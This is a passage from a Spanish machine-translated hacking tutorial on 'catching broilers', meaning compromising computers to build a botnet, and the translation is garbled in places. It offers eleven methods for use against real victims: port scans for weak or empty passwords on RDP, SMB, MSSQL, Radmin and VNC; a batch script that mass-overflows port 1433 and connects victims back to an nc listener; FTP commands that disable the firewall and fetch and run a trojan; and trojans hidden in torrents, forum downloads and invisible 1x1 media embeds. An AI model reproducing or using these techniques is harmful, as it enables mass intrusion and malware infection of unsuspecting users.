Red de conocimiento informático - Conocimiento del nombre de dominio - Cómo atrapar un pollo con las manos

Cómo atrapar un pollo con las manos

11 formas de atrapar pollos de engorde

En primer lugar debes preparar, un STAT libre de matar o una paloma libre de matar u otro control remoto, un espacio libre y algunas herramientas (mencionadas a continuación) para)

(1)

Escanear el puerto 3389 para atrapar pollos de engorde

(Adecuado para principiantes) (No se pueden atrapar pollos de engorde extranjeros)

Ahora hay una versión clonada de XP circulando en Internet. Después de la instalación, se abrirá una cuenta de forma predeterminada con el número de cuenta nuevo y la contraseña vacía, y básicamente se abrirá 3389. Podemos usar esto para detectar. pollos. Primero, use una herramienta de escaneo de puertos (como S Scan) para escanear el puerto 3389 de un segmento de IP. Después de escanear, use directamente el escritorio remoto para conectarse a la máquina que abre 3389 (también puede guardar los resultados como texto). archivo y use una herramienta para generar por lotes 3389 conexiones para conectarse), y luego ingrese la cuenta nueva para iniciar sesión. Si no hay nadie frente a las computadoras de otras personas, puede ir a su espacio para descargar e instalar el troyano que pasó ~~ Este método es sólo para sistemas XP. Si encuentra sistemas 2000 o 2003, no lo intente. Las desventajas también son obvias si alguien más inicia sesión en XP sin una cuenta nueva, lo eliminará si inicia sesión nuevamente (XP solo admite el inicio de sesión de un solo usuario y los usuarios deben usar herramientas para iniciar sesión). Si hay alguien frente a la computadora, no podrás iniciar sesión. Ve y abre IE para descargar el troyano.

(2)

Escanear el puerto 135 para atrapar pollos

Primero use un escáner de puertos para escanear el puerto 135 de una IP, luego guarde el resultado y luego use máquinas de filtro NTSCAN con contraseñas débiles y finalmente use recton para abrir telnet y pasar el caballo. Debido a que los puertos 135 y 445 ahora están bloqueados por el firewall, solo puede escanear el asador 135 local. Si desea capturarlos de otros lugares, solo puede usar el asador 135 de otros lugares para escanear. (Para obtener animaciones detalladas, puede buscar 135 en el sitio web del hacker)

(3)

Escanear el puerto 445 para atrapar pollos de engorde

Es similar al escaneo puerto 135 para detectar pollos de engorde Primero, use el puerto El escáner escanea el puerto 445 de un segmento de IP, luego guarda el resultado, luego usa NTSCAN para filtrar máquinas con contraseñas débiles y finalmente usa el kit de herramientas AHD para abrir Xinxiangma. Debido a que los puertos 135 y 445 ahora están bloqueados por el firewall, solo puede escanear el asador 445 local. Si desea capturarlos de otros lugares, solo puede usar el asador 445 externo para escanear.

(Para obtener una animación detallada, puede buscar 445 en el sitio web de piratas informáticos)

(4)

Desbordamiento de lote del puerto 1433 para atrapar pollos

Este método puede realizar captura de pollos completamente automática

p>

Herramientas a utilizar: S scan sqhelllo.exe nc.exe archivo por lotes

Primero escriba un proceso por lotes, abra el Bloc de notas, copie y modifique el siguiente código y guárdelo como un archivo escaneado +overflow.bat

@echo off

for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) hacer s .exe tcp %%i %%j 1433 1000 /save

@echo off

for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqhello %%i 1433 xxx.xxx.xx.xx 556

También necesitas crear un nuevo tt.txt con el segmento de IP que deseas escanear en el formato XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX, hay un espacio en el medio

1433 es el puerto a escanear, 1000 es el número de subprocesos de escaneo, no sqhello %%i 1433 xxx.xxx.xx.xx 556 XXX aquí se agrega Tu IP, 556 es el puerto que NC monitorea más tarde

Luego escribe un proceso por lotes

@echo off

Nc -l -vv -p 556< nc.txt&&%0 El 556 aquí debe ser consistente con lo anterior. También puede cambiarlo a otros valores, pero debe cambiar ambos lugares y luego. guárdelo como nc.bat

Luego cree un nuevo archivo nc.txt, complete el desbordamiento correctamente y deje que el programa descargue el código de su troyano.

Aquí tienes un código

echo open X.X.X.X (tu IP FTP)>>daima.txt

echo nombre de usuario>>daima.txt

p >

echo contraseña>>daima.txt

echo bin>>daima.txt (transmitir datos en binario)

echo get xxx.exe (su troyano El nombre del archivo debe colocarse en el directorio raíz)>>daima.txt

echo bye>>daima.txt

net stopsharedaccess (apagar el propio firewall de WINDOWS)

ftp -s:daima.txt

xxx.exe (rellene también el nombre del archivo de su troyano)

del daima.txt

Preste atención al arriba No elimine el carácter de retorno de carro en el código; de lo contrario, no podrá deshacerse de él.

Después de completar los pasos anteriores, puedes comenzar a barrer la parrilla.

Primero abra varios NC.bat, luego abra Scan+Overflow.bat y luego podrá irse a dormir. Escaneo automático, desbordamiento automático después del escaneo y apagado automático después del desbordamiento, ¡qué genial! Así que entremos en detalles aquí, jaja. También hay puertos 42 y 21 que también pueden desbordarse de esta manera. Simplemente use la herramienta de desbordamiento para estos puertos. Para obtener animaciones detalladas, puede buscar 1433 en el sitio web del pirata informático.

Olvidé mencionar que las herramientas anteriores y el procesamiento por lotes deben colocarse en la misma carpeta.

Tómate un descanso primero, estoy agotado de escribir tantas palabras

Continuar

(5)

Escanear 1433 Método para capturar broilers 2

Herramientas a utilizar: herramienta de utilización integral del escáner de puertos X-scanSQL

Como dijimos anteriormente, la tasa de éxito del desbordamiento 1433 ya no es alta, por lo que podemos usar otra un método.

Las máquinas con el puerto 1433 abierto generalmente tienen SQL instalado, por lo que podemos adivinar contraseñas SQL débiles para atrapar 1433 pollos.

Primero use un escáner de puertos para escanear el puerto 1433 de un segmento de IP y luego guarde el resultado como un archivo de texto. Luego use Simplemente marque SQL-SERVER en esta columna y deje las demás sin marcar. Luego, en la columna Configuración del complemento-Configuración relacionada con el puerto-Puerto a detectar, solo complete el puerto 1433. Entonces puedes comenzar a escanear. Una vez completado el escaneo, habrá un informe que enumera las máquinas con contraseñas débiles. Luego abra la Herramienta de explotación integral de SQL, ingrese la contraseña débil que escaneó para conectarse, luego abra la Herramienta de explotación integral de SQL - Directorio de explotación, cargue su troyano y. luego use comandos de DOS para ejecutar su troyano y todo estará bien.

(6)

Utilice WINNTAutoAttack para escanear contraseñas débiles de SA para detectar pollos de engorde

Herramienta: herramienta de utilización integral de WINNTAutoAttack SQL

Abra WINNTAutoAttack y busque Agregar una IP, y luego solo verifique la configuración en Configuración para detectar solo máquinas con comprobaciones de PING exitosas y SQL para enumerar cuentas SA con contraseñas vacías, y luego comience a escanear. Después de escanear, use la herramienta de utilización integral de SQL para conectarse y cargar. y ejecutar.

(7)

Escanear 4899 contraseña vacía para atrapar pollos

Herramienta: detector de puerto escáner 4899 Radmin

Primero use el puerto The El escáner escanea el puerto 4899 de una IP, luego usa el detector 4899 para importar la IP con el puerto 4899, luego busca contraseñas vacías y finalmente usa Radmin para conectarse a la máquina con contraseñas vacías, abrir la administración de archivos y el troyano cargado. Estará bien. Para obtener una animación detallada, puede buscar 4899 en el sitio web del pirata informático

(8)

Escanear el puerto 5900 para detectar el asador VNC

Herramienta: escáner VNC Conector VNC

Primero utilice el escáner VNC para escanear un segmento IP. El formato de escaneo es vscan.exe (nombre del archivo del escáner) -i 219.0.0.0-219.255.255.255 (escaneo de segmento IP) -p 5900 -vnc -. vv

Una vez completado el escaneo, se generará un archivo de texto en la misma carpeta donde se encuentra el escáner. Después de abrirlo, habrá una lista de IP. Hay algunas palabras detrás de la IP, como. parcheado, prohibido y vulnerable Sólo se pueden conectar las palabras "vulnerable". Luego use el conector VNC para conectarse. No necesito decir más a continuación, ¿verdad? Para animaciones detalladas, puedes buscar VNC en el sitio web del hacker.

A continuación, hablemos de enganchar al caballo y atrapar el pollo. Hay muchos métodos, como piratear BT, piratear espacio libre, piratear Thunder, etc., algunos de los cuales aún no conozco, jaja. Aquí hay algunos que sé hacer.

(9)

BT Trojan Trojan

Como sugiere el nombre, sirve para publicar su caballo de Troya en el sitio web de BT para que la gente lo descargue. Por supuesto, si solo publica archivos troyanos simples, el efecto definitivamente no será bueno, y ahora los sitios web generales de BT no permiten la publicación de archivos EXE. Entonces necesitamos algunos trucos ocultos. Primero podemos agrupar el troyano con algunas películas, música y juegos usando un paquete, y luego comprimirlo en un archivo RAR y publicarlo. ¿Quién sabrá que hay un troyano en el RAR cuando comiencen a descargarlo? Después de haber hecho un gran esfuerzo para descargarlo, lo abre y descubre que está en formato EXE, siempre hay algunos novatos que no pueden evitar abrirlo porque no quieren perder el tiempo que dedicaron, ¿verdad? ? Especialmente al descargar películas XXX, por supuesto, también puede crear un troyano web y luego insertar la dirección de su troyano web en el archivo que publica (no todos los archivos pueden ser así, solo sé que se pueden insertar archivos RM y EXE). ), Cuando otros descarguen y abran su troyano web, también lo abrirán. Si su sistema no proporciona las vulnerabilidades utilizadas por su troyano web, caerán en su trampa.

Algunos amigos pueden pensar que si incluyo el troyano con otros archivos y mantengo el formato en ese archivo (por ejemplo, RM mantendrá el formato RM después de agrupar el troyano), entonces otros no sospecharán, ¿verdad? Jaja, si hay algo tan bueno, entonces ¿por qué no dije anteriormente que el caballo de Troya y el archivo semilla BT deberían agruparse y publicarse, para que no te vuelvas loco? ~~ Así que déjame hablar de ello aquí. , el archivo generado después de agrupar el caballo de Troya con otros archivos solo puede estar en formato EXE, a menos que tenga una vulnerabilidad de desbordamiento en el formato del archivo que agrupa, de modo que el formato del archivo generado se pueda mantener en el formato del archivo que agrupaste. Sin embargo, existen muy pocas lagunas de este tipo en la actualidad y la mayoría de ellas han sido reparadas. Incluso si hay otras, es posible que no se hagan públicas. Si lo piensas bien, entenderás por qué. Aquí hablaré sobre una vulnerabilidad de desbordamiento de RAR reciente. Para todas las versiones inferiores a Winrar 3.6, siempre que su versión de Winrar sea inferior a 3.6, recibirá un ataque después de ejecutar el archivo RAR incluido con Wrangler. Los síntomas de este tipo de troyano son: después de ejecutar el archivo RAR, aparecerá un cuadro de diálogo indicando si está dañado o incorrecto, y luego el tamaño del archivo RAR se hará más pequeño y el tamaño reducido será el tamaño del troyano. caballo. Luego abra el archivo RAR nuevamente y todo estará bien, no aparecerá ningún cuadro de diálogo de error. Me gustaría recordarles que actualicen la versión WINRAR lo antes posible y tengan cuidado de no caer en la trampa.

(10)

Colgar un troyano en un espacio libre

De hecho, es similar a BT, es decir, cargar el troyano terminado en un espacio libre. espacio que solicitó y luego vaya al foro. Publique algunas publicaciones tentadoras para que otros descarguen su troyano. La ventaja es que no es necesario crear semillas como BT, que no solo requiere que la computadora esté encendida, sino que también afecta la velocidad de la red. Así colgué estos días. Conseguí un espacio libre, subí un troyano y publiqué una publicación en dos foros XXX. Colgué uno antes de acostarme todos los días. Solo duró unos días. 40-60 pollos de engorde cada día. Y la mayoría son de Estados Unidos

(11)

Usa RM para colgar un caballo en el foro

Primero, creas un archivo RM que solo dura unos segundos, luego inserte su troyano web, luego cárguelo en su espacio, luego publique en algunos foros que admitan la inserción de conexiones RM, haga clic para insertar el reproductor multimedia real, ingrese su dirección RM Wrangler y luego configure establezca la altura y el ancho en 1 (esta parte (para garantizar la ocultación), luego haga clic en Publicar, para que otros ejecuten su troyano RM cuando exploren su publicación. Sin embargo, configuramos la altura y el ancho en 1 antes, por lo que la conexión RM no ser visible en la publicación. De esta forma, otros caerán en nuestra trampa sin saberlo. Parece que el troyano FLASH también puede hacer esto. No lo he probado, pero puedes ir a investigar.